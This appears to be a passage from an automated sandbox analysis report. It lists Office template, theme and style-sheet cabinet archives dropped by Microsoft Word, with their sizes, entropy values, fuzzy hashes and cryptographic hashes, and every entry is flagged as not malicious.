                                        Entropy (8bit):7.808057272318224
                                        Encrypted:false
                                        SSDEEP:768:LgHv7aLOcoLGQ4EykdrHwLa+A8Pi6Iv8ACIa:LwvWyx4EykdTwLaWP7I0ACIa
                                        MD5:F10DF902980F1D5BEEA96B2C668408A7
                                        SHA1:92D341581B9E24284B7C29E5623F8028DBBAAFE9
                                        SHA-256:E0100320A4F63E07C77138A89EA24A1CBD69784A89FE3BF83E35576114B4CE02
                                        SHA-512:00A8FBCD17D791289AC8F12DC3C404B0AFD240278492DF74D2C5F37609B11D91A26D737BE95D3FE01CDBC25EEDC6DA0C2D63A2CCC4AB208D6E054014083365FB
                                        Malicious:false
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:Microsoft Cabinet archive data, many, 4967 bytes, 2 files, at 0x44 "TabList.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
                                        Category:dropped
                                        Size (bytes):21111
                                        Entropy (8bit):7.6297992466897675
                                        Encrypted:false
                                        SSDEEP:384:wWZsOvbMZGgbA8E0GftpBjEtnFLrHRN7Dfll7PK/pirk:xZRvuzA8Pi6t9DPISk
                                        MD5:D30AD26DBB6DECA4FDD294F48EDAD55D
                                        SHA1:CA767A1B6AF72CF170C9E10438F61797E0F2E8CE
                                        SHA-256:6B1633DD765A11E7ED26F8F9A4DD45023B3E4ADB903C934DF3917D07A3856BFF
                                        SHA-512:7B519F5D82BA0DA3B2EFFAD3029C7CAB63905D534F3CF1F7EA3446C42FA2130665CA7569A105C18289D65FA955C5624009C1D571E8960D2B7C52E0D8B42BE457
                                        Malicious:false
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:Microsoft Cabinet archive data, many, 14939 bytes, 2 files, at 0x44 "CircleProcess.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
                                        Category:dropped
                                        Size (bytes):31083
                                        Entropy (8bit):7.814202819173796
                                        Encrypted:false
                                        SSDEEP:384:0XbSq3W46TVZb5fOFo1HtZwGqtRT44hS+nyBoiuFgbA8E0GftpBjEcBFLrHRN7Ku:0XpOflfOFo1DMr/iuuA8Pi6cfKjW66b
                                        MD5:89A9818E6658D73A73B642522FF8701F
                                        SHA1:E66C95E957B74E90B444FF16D9B270ADAB12E0F4
                                        SHA-256:F747DD8B79FC69217FA3E36FAE0AB417C1A0759C28C2C4F8B7450C70171228E6
                                        SHA-512:321782B0B633380DA69BD7E98AA05BE7FA5D19A131294CC7C0A598A6A1A1AEF97AB1068427E4223AA30976E3C8246FF5C3C1265D4768FE9909B37F38CBC9E60D
                                        Malicious:false
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:Microsoft Cabinet archive data, many, 18672 bytes, 2 files, at 0x4c "APASixthEditionOfficeOnline.xsl", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 11 datablocks, 0x1203 compression
                                        Category:dropped
                                        Size (bytes):34816
                                        Entropy (8bit):7.840826397575377
                                        Encrypted:false
                                        SSDEEP:768:i3R9VYnIYfPYmqX0CnF1SRHVnLG8Pi61YbEIFO:ih9VjYfPYlk+F1SJxP71YbEIFO
                                        MD5:62863124CDCDA135ECC0E722782CB888
                                        SHA1:2543B8A9D3B2304BB73D2ADBEC60DB040B732055
                                        SHA-256:23CCFB7206A8F77A13080998EC6EF95B59B3C3E12B72B2D2AD4E53B0B26BB8C3
                                        SHA-512:2734D1119DC14B7DFB417F217867EF8CE8E73D69C332587278C0896B91247A40C289426A1A53F1796CCB42190001273D35525FCEA8BA2932A69A581972A1EF00
                                        Malicious:false
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:Microsoft Cabinet archive data, many, 6450 bytes, 2 files, at 0x44 "ThemePictureAccent.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
                                        Category:dropped
                                        Size (bytes):22594
                                        Entropy (8bit):7.674816892242868
                                        Encrypted:false
                                        SSDEEP:384:L7d2l8FbHaaIKbtv1gDISi8E0GftpBjEZRFLrHRN74bUll7PK/pd:LUlCIOt/8Pi6Zv4bMId
                                        MD5:EE0129C7CC1AC92BBC3D6CB0F653FCAE
                                        SHA1:4ABAA858176B349BDAB826A7C5F9F00AC5499580
                                        SHA-256:345AA5CA2496F975B7E33C182D5E57377F8B740F23E9A55F4B2B446723947B72
                                        SHA-512:CDDABE701C8CBA5BD5D131ABB85F9241212967CE6924E34B9D78D6F43D76A8DE017E28302FF13CE800456AD6D1B5B8FFD8891A66E5BE0C1E74CF19DF9A7AD959
                                        Malicious:false
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:Microsoft Cabinet archive data, many, 5647 bytes, 2 files, at 0x44 "RadialPictureList.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
                                        Category:dropped
                                        Size (bytes):21791
                                        Entropy (8bit):7.65837691872985
                                        Encrypted:false
                                        SSDEEP:384:PWew5RNDcvPgbA8E0GftpBjE0hsyaFLrHRN7BD9lI66YR:P3GRNDcEA8Pi60hsyABDo66g
                                        MD5:7BF88B3CA20EB71ED453A3361908E010
                                        SHA1:F75F86557051160507397F653D7768836E3B5655
                                        SHA-256:E555A610A61DB4F45A29A7FB196A9726C25772594252AD534453E69F05345283
                                        SHA-512:2C3DFB0F8913D1D8FF95A55E1A1FD58CE1F9D034268CD7BC0D2BF2DCEFEA8EF05DD62B9AFDE1F983CACADD0529538381632ADFE7195EAC19CE4143414C44DBE3
                                        Malicious:false
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:Microsoft Cabinet archive data, many, 3144 bytes, 2 files, at 0x44 "VaryingWidthList.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
                                        Category:dropped
                                        Size (bytes):19288
                                        Entropy (8bit):7.570850633867256
                                        Encrypted:false
                                        SSDEEP:384:5ZII4Hf+7G8E0GftpBjCwBFLrHRN7bcClvQyUTL2mH:pG8PicgbcAvU+mH
                                        MD5:B9A6FF715719EE9DE16421AB983CA745
                                        SHA1:6B3F68B224020CD4BF142D7EDAAEC6B471870358
                                        SHA-256:E3BE3F1E341C0FA5E9CB79E2739CF0565C6EA6C189EA3E53ACF04320459A7070
                                        SHA-512:062A765AC4602DB64D0504B79BE7380C14C143091A09F98A5E03E18747B2166BD862CE7EF55403D27B54CEB397D95BFAE3195C15D5516786FEBDAC6CD5FBF9CD
                                        Malicious:false
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:Microsoft Cabinet archive data, many, 5731 bytes, 2 files, at 0x44 "ThemePictureAlternatingAccent.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
                                        Category:dropped
                                        Size (bytes):21875
                                        Entropy (8bit):7.6559132103953305
                                        Encrypted:false
                                        SSDEEP:384:k73HRpZA6B3ulrnxtRT7G8E0GftpBjEdHqlFLrHRN7uhFlvQyUTL2m4c:k7XRgIkrG8Pi6dmuNvU+mp
                                        MD5:E532038762503FFA1371DF03FA2E222D
                                        SHA1:F343B559AE21DAEF06CBCD8B2B3695DE1B1A46F0
                                        SHA-256:5C70DD1551EB8B9B13EFAFEEAF70F08B307E110CAEE75AD9908A6A42BBCCB07E
                                        SHA-512:E0712B481F1991256A01C3D02ED56645F61AA46EB5DE47E5D64D5ECD20052CDA0EE7D38208B5EE982971CCA59F2717B7CAE4DFCF235B779215E7613AA5DCD976
                                        Malicious:false
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:Microsoft Cabinet archive data, many, 10800 bytes, 2 files, at 0x44 "ConvergingText.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
                                        Category:dropped
                                        Size (bytes):26944
                                        Entropy (8bit):7.7574645319832225
                                        Encrypted:false
                                        SSDEEP:384:sbUX16g8/atF4NB3TJOvqeMRD/8svIZj/OwgbA8E0GftpBjEYwFLrHRN7mYll7PY:sbhg8yY4nMZK2hA8Pi6Yum4IVR
                                        MD5:F913DD84915753042D856CEC4E5DABA5
                                        SHA1:FB1E423C8D09388C3F0B6D44364D94D786E8CF53
                                        SHA-256:AA03AFB681A76C86C1BD8902EE2BBA31A644841CE6BCB913C8B5032713265578
                                        SHA-512:C48850522C809B18208403B3E721ABEB1187F954045CE2F8C48522368171CC8FAF5F30FA44F6762AFDE130EC72284BB2E74097A35FE61F056656A27F9413C6B6
                                        Malicious:false
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:Microsoft Cabinet archive data, many, 15461 bytes, 2 files, at 0x4c "gostname.xsl", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 8 datablocks, 0x1203 compression
                                        Category:dropped
                                        Size (bytes):31605
                                        Entropy (8bit):7.820497014278096
                                        Encrypted:false
                                        SSDEEP:384:7SpOUxgQ9gFodHZktfHa2TSmcAg76j8/xorK0JoZgbA8E0GftpBjE2PzFLrHRN7S:OngHltf7Bcp/xoB3A8Pi625D8RA54
                                        MD5:69EDB3BF81C99FE8A94BBA03408C5AE1
                                        SHA1:1AC85B369A976F35244BEEFA9C06787055C869C1
                                        SHA-256:CEBE759BC4509700E3D23C6A5DF8D889132A60EBC92260A74947EAA1089E2789
                                        SHA-512:BEA70229A21FBA3FD6D47A3DC5BECBA3EAA0335C08D486FAB808344BFAA2F7B24DD9A14A0F070E13A42BE45DE3FF54D32CF38B43192996D20DF4176964E81A53
                                        Malicious:false
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:Microsoft Cabinet archive data, many, 27509 bytes, 2 files, at 0x4c "Equations.dotx", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 2 datablocks, 0x1203 compression
                                        Category:dropped
                                        Size (bytes):43653
                                        Entropy (8bit):7.899157106666598
                                        Encrypted:false
                                        SSDEEP:768:+bjfeR1OOZvv439PlDe5/QzhgFSo0UEDmJwkqTA8Pi63Bsgn66w:IM3CN9ZzhFbUUwaP73BsB6w
                                        MD5:DA3380458170E60CBEA72602FDD0D955
                                        SHA1:1D059F8CFD69F193D363DA337C87136885018F0F
                                        SHA-256:6F8FFB225F3B8C7ADE31A17A02F941FC534E4F7B5EE678B21CD9060282034701
                                        SHA-512:17080110000C66DF2282FF4B8FD332467AF8CEFFA312C617E958FDFEBEE8EEA9E316201E8ABC8B30797BB6124A5CC7F649119A9C496316434B5AB23D2FBD5BB8
                                        Malicious:false
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:Microsoft Cabinet archive data, many, 19375 bytes, 2 files, at 0x4c "turabian.xsl", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 11 datablocks, 0x1203 compression
                                        Category:dropped
                                        Size (bytes):35519
                                        Entropy (8bit):7.846686335981972
                                        Encrypted:false
                                        SSDEEP:768:2LFougzHaUdBKUsM+Z56zBjA8Pi6bo+ld8IX:MFodzHaULR9P7bo+l6IX
                                        MD5:53EE9DA49D0B84357038ECF376838D2E
                                        SHA1:AB03F46783B2227F312187DD84DC0C517510DE20
                                        SHA-256:9E46B8BA0BAD6E534AF33015C86396C33C5088D3AE5389217A5E90BA68252374
                                        SHA-512:751300C76ECE4901801B1F9F51EACA7A758D5D4E6507E227558AAAAF8E547C3D59FA56153FEA96B6B2D7EB08C7AF2E4D5568ACE7E798D1A86CEDE363EFBECF7C
                                        Malicious:false
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:Microsoft Cabinet archive data, many, 17466 bytes, 2 files, at 0x4c "chicago.xsl", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 10 datablocks, 0x1203 compression
                                        Category:dropped
                                        Size (bytes):33610
                                        Entropy (8bit):7.8340762758330476
                                        Encrypted:false
                                        SSDEEP:768:IlFYcxiahedKSDNAPk5WEEfA8Pi6xnOKMRA58:2JitdKsNAM5WBDP7xOKMq58
                                        MD5:51804E255C573176039F4D5B55C12AB2
                                        SHA1:A4822E5072B858A7CCA7DE948CAA7D2268F1BB4B
                                        SHA-256:3C6F66790C543D4E9D8E0E6F476B1ACADF0A5FCDD561B8484D8DDDADFDF8134B
                                        SHA-512:2AC8B1E433C9283377B725A03AE72374663FEC81ABBA4C049B80409819BB9613E135FCD640ED433701795BDF4D5822461D76A06859C4084E7BAE216D771BB091
                                        Malicious:false
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:Microsoft Cabinet archive data, many, 6196 bytes, 2 files, at 0x44 "ThemePictureGrid.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
                                        Category:dropped
                                        Size (bytes):22340
                                        Entropy (8bit):7.668619892503165
                                        Encrypted:false
                                        SSDEEP:384:GByvLdFHny7G8E0GftpBjE8upFLrHRN778lvQyUTL2mm2y:Oy3HkG8Pi6887mvU+ma
                                        MD5:8B29FAB506FD65C21C9CD6FE6BBBC146
                                        SHA1:CE1B8A57BB3C682F6A0AFC32955DAFD360720FDF
                                        SHA-256:773AC516C9B9B28058128EC9BE099F817F3F90211AC70DC68077599929683D6F
                                        SHA-512:AFA82CCBC0AEF9FAE4E728E4212E9C6EB2396D7330CCBE57F8979377D336B4DACF4F3BF835D04ABCEBCDB824B9A9147B4A7B5F12B8ADDADF42AB2C34A7450ADE
                                        Malicious:false
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:Microsoft Cabinet archive data, many, 5864 bytes, 2 files, at 0x44 "architecture.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
                                        Category:dropped
                                        Size (bytes):22008
                                        Entropy (8bit):7.662386258803613
                                        Encrypted:false
                                        SSDEEP:384:M7FUtfIdqSHQs7G8E0GftpBjED/C4RQrFLrHRN7TT8DlvQyUTL2mH:sWgdqR2G8Pi6D6YQZTTMvU+mH
                                        MD5:ABBF10CEE9480E41D81277E9538F98CB
                                        SHA1:F4EA53D180C95E78CC1DA88CD63F4C099BF0512C
                                        SHA-256:557E0714D5536070131E7E7CDD18F0EF23FE6FB12381040812D022EC0FEE7957
                                        SHA-512:9430DAACF3CA67A18813ECD842BE80155FD2DE0D55B7CD16560F4AAEFDA781C3E4B714D850D367259CAAB28A3BF841A5CB42140B19CFE04AC3C23C358CA87FFB
                                        Malicious:false
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:Microsoft Cabinet archive data, many, 15327 bytes, 2 files, at 0x4c "sist02.xsl", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 8 datablocks, 0x1203 compression
                                        Category:dropped
                                        Size (bytes):31471
                                        Entropy (8bit):7.818389271364328
                                        Encrypted:false
                                        SSDEEP:768:eNtFWk68dbr2QxbM971RqpzAA8Pi6TlHaGRA5yr:eNtEkpGSbuHAkP7TlHaGq54
                                        MD5:91AADBEC4171CFA8292B618492F5EF34
                                        SHA1:A47DEB62A21056376DD8F862E1300F1E7DC69D1D
                                        SHA-256:7E1A90CDB2BA7F03ABCB4687F0931858BF57E13552E0E4E54EC69A27325011EA
                                        SHA-512:1978280C699F7F739CD9F6A81F2B665643BD0BE42CE815D22528F0D57C5A646FC30AAE517D4A0A374EFB8BD3C53EB9B3D129660503A82BA065679BBBB39BD8D5
                                        Malicious:false
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:Microsoft Cabinet archive data, many, 30269 bytes, 2 files, at 0x4c "Text Sidebar (Annual Report Red and Black design).docx", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 2 datablocks, 0x1203 compression
                                        Category:dropped
                                        Size (bytes):46413
                                        Entropy (8bit):7.9071408623961394
                                        Encrypted:false
                                        SSDEEP:768:WaxA0CH65GY3+fvCXCttfR8JEBrkquwDn+QV5V+vNWBatX/xG8Pi65sMuMjvU+mQ:hne65GYOfKXMSEBrBtDnzFAI4JxP75sM
                                        MD5:C455C4BC4BEC9E0DA67C4D1E53E46D5A
                                        SHA1:7674600C387114B0F98EC925BE74E811FB25C325
                                        SHA-256:40E9AF9284FF07FDB75C33A11A794F5333712BAA4A6CF82FA529FBAF5AD0FED0
                                        SHA-512:08166F6CB3F140E4820F86918F59295CAD8B4A17240C206DCBA8B46088110BDF4E4ADBAB9F6380315AD4590CA7C8ECDC9AFAC6BD1935B17AFB411F325FE81720
                                        Malicious:false
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:Microsoft Cabinet archive data, many, 252241 bytes, 2 files, at 0x44 +A "content.inf" +A "Frame.thmx", flags 0x4, ID 34169, number 1, extra bytes 20 in head, 16 datablocks, 0x1503 compression
                                        Category:dropped
                                        Size (bytes):271273
                                        Entropy (8bit):7.995547668305345
                                        Encrypted:true
                                        SSDEEP:6144:zfdvQnJMwXse4Vradf3mrC7woyWbjKlCVC7K:zfJwJse4VrS1AK
                                        MD5:21437897C9B88AC2CB2BB2FEF922D191
                                        SHA1:0CAD3D026AF2270013F67E43CB44F0568013162D
                                        SHA-256:372572DCBAD590F64F5D18727757CBDF9366DDE90955C79A0FCC9F536DAB0384
                                        SHA-512:A74DA3775C19A7AF4A689FA4D920E416AB9F40A8BDA82CCF651DDB3EACBC5E932A120ABF55F855474CEBED0B0082F45D091E211AAEA6460424BFD23C2A445CC7
                                        Malicious:false
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:Microsoft Cabinet archive data, many, 259074 bytes, 2 files, at 0x44 +A "content.inf" +A "Dividend.thmx", flags 0x4, ID 58359, number 1, extra bytes 20 in head, 18 datablocks, 0x1503 compression
                                        Category:dropped
                                        Size (bytes):276650
                                        Entropy (8bit):7.995561338730199
                                        Encrypted:true
                                        SSDEEP:6144:H2a+HFkDF8gpmMt4kzwVVqhSYO6DITxPWgJl1CFExwXyo7N:mlZgFtIVVTuDExeWuv7N
                                        MD5:84D8F3848E7424CBE3801F9570E05018
                                        SHA1:71D7F2621DA8B295CE6885F8C7C81016D583C6B1
                                        SHA-256:B4BC3CD34BD328AAF68289CC0ED4D5CF8167F1EE1D7BE20232ED4747FF96A80A
                                        SHA-512:E27873BFD95E464CB58B3855F2DA404858B935530CF74C7F86FF8B3FC3086C2FAEA09FA479F0CA7B04D87595ED8C4D07D104426FF92DFB31BED405FA7A017DA8
                                        Malicious:false
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:Microsoft Cabinet archive data, many, 214772 bytes, 2 files, at 0x44 +A "content.inf" +A "Parcel.thmx", flags 0x4, ID 26500, number 1, extra bytes 20 in head, 19 datablocks, 0x1503 compression
                                        Category:dropped
                                        Size (bytes):230916
                                        Entropy (8bit):7.994759087207758
                                        Encrypted:true
                                        SSDEEP:6144:OTIPtMXmJWnzPS3pqnkeuJXW+FNx1a72rLiQxEBTR:750nz63/FJRFLISnp+Bt
                                        MD5:93FA9F779520AB2D22AC4EA864B7BB34
                                        SHA1:D1E9F53A0E012A89978A3C9DED73FB1D380A9D8A
                                        SHA-256:6A3801C1D4CF0C19A990282D93AC16007F6CACB645F0E0684EF2EDAC02647833
                                        SHA-512:AA91B4565C88E5DA0CF294DC4A2C91EAEB6D81DCA96069DB032412E1946212A13C3580F5C0143DD28B33F4849D2C2DF2214CE1E20598D634E78663D20F03C4E6
                                        Malicious:false
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:Microsoft Cabinet archive data, many, 26644 bytes, 2 files, at 0x4c "Element design set.dotx", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 2 datablocks, 0x1203 compression
                                        Category:dropped
                                        Size (bytes):42788
                                        Entropy (8bit):7.89307894056
                                        Encrypted:false
                                        SSDEEP:768:Hx+UzBiwDQTXgBm029ClGn4BZz6i5kIew/jG8Pi6lYJz1gH:0ZXc29eGn2n5klwjxP7l2z1gH
                                        MD5:21A4B7B71631C2CCDA5FBBA63751F0D2
                                        SHA1:DE65DC641D188062EF9385CC573B070AAA8BDD28
                                        SHA-256:AE0C5A2C8377DBA613C576B1FF73F01AE8EF4A3A4A10B078B5752FB712B3776C
                                        SHA-512:075A9E95C6EC7E358EA8942CF55EFB72AC797DEE1F1FFCD27AD60472ED38A76048D356638EF6EAC22106F94AFEE9D543B502D5E80B964471FA7419D288867D5D
                                        Malicious:false
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:Microsoft Cabinet archive data, many, 243642 bytes, 2 files, at 0x44 +A "content.inf" +A "Metropolitan.thmx", flags 0x4, ID 19054, number 1, extra bytes 20 in head, 24 datablocks, 0x1503 compression
                                        Category:dropped
                                        Size (bytes):261258
                                        Entropy (8bit):7.99541965268665
                                        Encrypted:true
                                        SSDEEP:6144:9blShNYrHNn0JU+D+kh8CIjXHWC7X0nZLC9Ge2KY/WfI:9ZSTYrtn0Sk+CIDHWC7chVKYx
                                        MD5:65828DC7BE8BA1CE61AD7142252ACC54
                                        SHA1:538B186EAF960A076474A64F508B6C47B7699DD3
                                        SHA-256:849E2E915AA61E2F831E54F337A745A5946467D539CCBD0214B4742F4E7E94FF
                                        SHA-512:8C129F26F77B4E73BF02DE8F9A9F432BB7E632EE4ABAD560A331C2A12DA9EF5840D737BFC1CE24FDCBB7EF39F30F98A00DD17F42C51216F37D0D237145B8DE15
                                        Malicious:false
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:Microsoft Cabinet archive data, many, 279287 bytes, 2 files, at 0x44 +A "Basis.thmx" +A "content.inf", flags 0x4, ID 55632, number 1, extra bytes 20 in head, 18 datablocks, 0x1503 compression
                                        Category:dropped
                                        Size (bytes):295527
                                        Entropy (8bit):7.996203550147553
                                        Encrypted:true
                                        SSDEEP:6144:nwVaEqsf23c9shf6UyOGgDWDn/p3fd+zkPWnvGL3n9bQnkmVheyqtkl:MlPfW6sVEDn/pPdhWnvGL36zyyqal
                                        MD5:9A07035EF802BF89F6ED254D0DB02AB0
                                        SHA1:9A48C1962B5CF1EE37FEEC861A5B51CE11091E78
                                        SHA-256:6CB03CEBAB2C28BF5318B13EEEE49FBED8DCEDAF771DE78126D1BFE9BD81C674
                                        SHA-512:BE13D6D88C68FA16390B04130838D69CDB6169DC16AF0E198C905B22C25B345C541F8FCCD4690D88BE89383C19943B34EDC67793F5EB90A97CD6F6ECCB757F87
                                        Malicious:false
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:Microsoft Cabinet archive data, many, 291188 bytes, 2 files, at 0x44 +A "Banded.thmx" +A "content.inf", flags 0x4, ID 56338, number 1, extra bytes 20 in head, 18 datablocks, 0x1503 compression
                                        Category:dropped
                                        Size (bytes):307348
                                        Entropy (8bit):7.996451393909308
                                        Encrypted:true
                                        SSDEEP:6144:7vH3uG+yiWx0eVJyORloyyDqnHefzOs81MrXLXx7:b36yiWH/LRS2CJl1
                                        MD5:0EBC45AA0E67CC435D0745438371F948
                                        SHA1:5584210C4A8B04F9C78F703734387391D6B5B347
                                        SHA-256:3744BFA286CFCFF46E51E6A68823A23F55416CD6619156B5929FED1F7778F1C7
                                        SHA-512:31761037C723C515C1A9A404E235FE0B412222CB239B86162D17763565D0CCB010397376FB9B61B38A6AEBDD5E6857FD8383045F924AF8A83F2C9B9AF6B81407
                                        Malicious:false
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:Microsoft Cabinet archive data, many, 533290 bytes, 2 files, at 0x44 +A "content.inf" +A "Parallax.thmx", flags 0x4, ID 64081, number 1, extra bytes 20 in head, 29 datablocks, 0x1503 compression
                                        Category:dropped
                                        Size (bytes):550906
                                        Entropy (8bit):7.998289614787931
                                        Encrypted:true
                                        SSDEEP:12288:N4Ar9NyDhUQM0Hk86V1YnOIxQ9e6SJbj2OjK:jAG8wa5Qw6SZ2Oj
                                        MD5:1C12315C862A745A647DAD546EB4267E
                                        SHA1:B3FA11A511A634EEC92B051D04F8C1F0E84B3FD6
                                        SHA-256:4E2E93EBAC4AD3F8690B020040D1AE3F8E7905AB7286FC25671E07AA0282CAC0
                                        SHA-512:CA8916694D42BAC0AD38B453849958E524E9EED2343EBAA10DF7A8ACD13DF5977F91A4F2773F1E57900EF044CFA7AF8A94B3E2DCE734D7A467DBB192408BC240
                                        Malicious:false
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:Microsoft Cabinet archive data, many, 704319 bytes, 2 files, at 0x44 +A "content.inf" +A "Wood_Type.thmx", flags 0x4, ID 5778, number 1, extra bytes 20 in head, 51 datablocks, 0x1503 compression
                                        Category:dropped
                                        Size (bytes):723359
                                        Entropy (8bit):7.997550445816903
                                        Encrypted:true
                                        SSDEEP:12288:NPnBZX7wR3tMwYqNDQGnXTtfzO5U7yo6O7bLhe8yE3LLDok4a:JBMbYE7xzO5U917bLh/DL3oJa
                                        MD5:748A53C6BDD5CE97BD54A76C7A334286
                                        SHA1:7DD9EEDB13AC187E375AD70F0622518662C61D9F
                                        SHA-256:9AF92B1671772E8E781B58217DAB481F0AFBCF646DE36BC1BFFC7D411D14E351
                                        SHA-512:EC8601D1A0DBD5D79C67AF2E90FAD44BBC0B890412842BF69065A2C7CB16C12B1C5FF594135C7B67B830779645801DA20C9BE8D629B6AD8A3BA656E0598F0540
                                        Malicious:false
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:Microsoft Cabinet archive data, many, 206792 bytes, 2 files, at 0x44 +A "content.inf" +A "View.thmx", flags 0x4, ID 33885, number 1, extra bytes 20 in head, 15 datablocks, 0x1503 compression
                                        Category:dropped
                                        Size (bytes):222992
                                        Entropy (8bit):7.994458910952451
                                        Encrypted:true
                                        SSDEEP:6144:k8/c2cF9GTLqsTmYstUdx+dwb2ooiVOfiI17zWbQ:jbzqGdpbZ/Mf3h68
                                        MD5:26BEAB9CCEAFE4FBF0B7C0362681A9D2
                                        SHA1:F63DD970040CA9F6CFCF5793FF7D4F1F4A69C601
                                        SHA-256:217EC1B6E00A24583B166026DEC480D447FB564CF3BCA81984684648C272F767
                                        SHA-512:2BBEA62360E21E179014045EE95C7B330A086014F582439903F960375CA7E9C0CF5C0D5BB24E94279362965CA9D6A37E6AAA6A7C5969FC1970F6C50876582BE1
                                        Malicious:false
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:Microsoft Cabinet archive data, many, 624532 bytes, 2 files, at 0x44 +A "content.inf" +A "Quotable.thmx", flags 0x4, ID 13510, number 1, extra bytes 20 in head, 30 datablocks, 0x1503 compression
                                        Category:dropped
                                        Size (bytes):640684
                                        Entropy (8bit):7.99860205353102
                                        Encrypted:true
                                        SSDEEP:12288:eV7ivfl+kbkIrWu+2aoRjwv/cSUWauGPo2v65s4QqcT3ZCCz6CSj8aC:fdhr1+3y4MWaC2CO4V+3ZCCDsO
                                        MD5:F93364EEC6C4FFA5768DE545A2C34F07
                                        SHA1:166398552F6B7F4509732E148F93E207DD60420B
                                        SHA-256:296B915148B29751E68687AE37D3FAFD9FFDDF458C48EB059A964D8F2291E899
                                        SHA-512:4F0965B4C5F543B857D9A44C7A125DDD3E8B74837A0FDD80C1FDC841BF22FC4CE4ADB83ACA8AA65A64F8AE6D764FA7B45B58556F44CFCE92BFAC43762A3BC5F4
                                        Malicious:false
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:Microsoft Cabinet archive data, many, 682092 bytes, 2 files, at 0x44 +A "Berlin.thmx" +A "content.inf", flags 0x4, ID 46672, number 1, extra bytes 20 in head, 30 datablocks, 0x1503 compression
                                        Category:dropped
                                        Size (bytes):698244
                                        Entropy (8bit):7.997838239368002
                                        Encrypted:true
                                        SSDEEP:12288:bUfKzAwwP7XAMWtr4FvMRt4lX0hnBdThiSb32+TdysrQgn7v4EemC6:sr7AMkJ34xu1bm4ZrQaY6
                                        MD5:E29CE2663A56A1444EAA3732FFB82940
                                        SHA1:767A14B51BE74D443B5A3FEFF4D870C61CB76501
                                        SHA-256:3732EB6166945DB2BF792DA04199B5C4A0FB3C96621ECBFDEAF2EA1699BA88EE
                                        SHA-512:6BC420F3A69E03D01A955570DC0656C83C9E842C99CF7B429122E612E1E54875C61063843D8A24DB7EC2035626F02DDABF6D84FC3902184C1EFF3583DBB4D3D8
                                        Malicious:false
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:Microsoft Cabinet archive data, many, 937309 bytes, 2 files, at 0x44 +A "content.inf" +A "Gallery.thmx", flags 0x4, ID 44349, number 1, extra bytes 20 in head, 34 datablocks, 0x1503 compression
                                        Category:dropped
                                        Size (bytes):953453
                                        Entropy (8bit):7.99899040756787
                                        Encrypted:true
                                        SSDEEP:24576:9B1Onw3vg7aeYPagzbJ5Vhv6LnV2Dhl7GEYqVjcyd:vww3o7BYPJbJ5Vh6UCqZfd
